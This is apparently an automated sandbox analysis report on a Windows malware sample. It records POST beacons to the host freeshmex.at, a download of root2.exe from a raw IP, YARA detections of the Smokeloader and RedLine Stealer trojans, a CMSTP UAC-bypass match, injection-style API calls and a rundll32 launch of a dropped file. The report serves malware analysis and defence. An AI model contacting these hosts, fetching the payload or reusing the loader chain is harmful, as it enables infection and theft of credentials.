          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vppnf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jlawl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lccctghley.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gkaof.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wwdygs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: freeshmex.at
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
          Source: unknownHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://idgtg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: freeshmex.at
          Source: unknownDNS traffic detected: queries for: freeshmex.at
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004EE626 InternetReadFile,8_2_004EE626
          Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
          Source: global trafficHTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
          Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49716 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          Source: Yara matchFile source: 00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.580944617.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.580870486.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.431205503.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.378341751.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.431016590.0000000000480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.377969470.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: file.exe, 00000001.00000002.378045124.00000000006F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004F306A CryptImportKey,_itoa,8_2_004F306A
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_005032A3 CryptImportKey,8_2_005032A3
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B6340 CryptImportKey,8_2_004B6340
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00495303 CryptImportKey,8_2_00495303
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004BEACF CryptImportKey,8_2_004BEACF
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0048CC12 CryptAcquireContextA,GetProcAddress,CryptImportKey,8_2_0048CC12

          System Summary

          Source: 15.2.2B26.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 10.2.2B26.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000011.00000002.581088904.0000000000631000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000011.00000002.580849383.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000011.00000002.580944617.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000011.00000002.580870486.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000005.00000002.431504575.000000000052B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000005.00000002.430978664.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000005.00000002.431205503.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000001.00000002.378341751.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000008.00000002.444948921.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000005.00000002.431016590.0000000000480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 00000001.00000002.377931362.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000001.00000002.377969470.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 0000000A.00000002.475894264.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 0000000F.00000002.494410368.0000000000770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000008.00000002.443911469.000000000218A000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000F.00000002.494599306.0000000000831000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000001.00000002.378115658.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000A.00000002.474957989.000000000078B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 15.2.2B26.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 10.2.2B26.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000011.00000002.581088904.0000000000631000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000011.00000002.580849383.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000011.00000002.580944617.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000011.00000002.580870486.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000005.00000002.431504575.000000000052B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000005.00000002.430978664.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000005.00000002.431205503.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000001.00000002.378341751.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000008.00000002.444948921.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000005.00000002.431016590.0000000000480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000001.00000002.377931362.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000001.00000002.377969470.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 0000000A.00000002.475894264.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 0000000F.00000002.494410368.0000000000770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000008.00000002.443911469.000000000218A000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000F.00000002.494599306.0000000000831000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000001.00000002.378115658.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000A.00000002.474957989.000000000078B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004096E81_2_004096E8
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040C4841_2_0040C484
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040BF401_2_0040BF40
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040D5351_2_0040D535
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004096E85_2_004096E8
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_0040C4845_2_0040C484
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_0040BF405_2_0040BF40
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_0040D5355_2_0040D535
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B60818_2_004B6081
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004F210A8_2_004F210A
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004831AB8_2_004831AB
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004E92BB8_2_004E92BB
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_005063008_2_00506300
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004E68778_2_004E6877
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004DCA2B8_2_004DCA2B
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004DBC5A8_2_004DBC5A
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004A8C0C8_2_004A8C0C
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004013D8 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_004013D8
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401407 NtAllocateVirtualMemory,1_2_00401407
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004014DA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_004014DA
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004014DD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_004014DD
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004013E3 NtAllocateVirtualMemory,1_2_004013E3
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004013F6 NtAllocateVirtualMemory,1_2_004013F6
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004013FE NtAllocateVirtualMemory,1_2_004013FE
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004014A8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_004014A8
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004014B3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_004014B3
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_004014BF
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004013D8 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004013D8
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_00401407 NtAllocateVirtualMemory,5_2_00401407
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004014DA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014DA
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004014DD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014DD
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004013E3 NtAllocateVirtualMemory,5_2_004013E3
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004013F6 NtAllocateVirtualMemory,5_2_004013F6
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004013FE NtAllocateVirtualMemory,5_2_004013FE
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004014A8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014A8
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004014B3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014B3
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014BF
          Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Wuwedteata.tmp 6ECC725EAB418E27D8FA2F1031FCE6BC119D677B8D72E0447050A87489E8E0CA
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\cgjtubb C:\Users\user\AppData\Roaming\cgjtubb
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FD31.exe C:\Users\user\AppData\Local\Temp\FD31.exe
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Wuwedteata.tmp",Tiuqiiueaur
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2B26.exe C:\Users\user\AppData\Local\Temp\2B26.exe
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\2B26.exe "C:\Users\user\AppData\Local\Temp\2B26.exe"
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\cgjtubb C:\Users\user\AppData\Roaming\cgjtubb
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\cgjtubb
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FD31.tmp
          Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@10/5@35/10
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00714147 CreateToolhelp32Snapshot,Module32First,1_2_00714147
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeMutant created: \Sessions\1\BaseNamedObjects\WTfewgNmxpcaVXHKTu
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
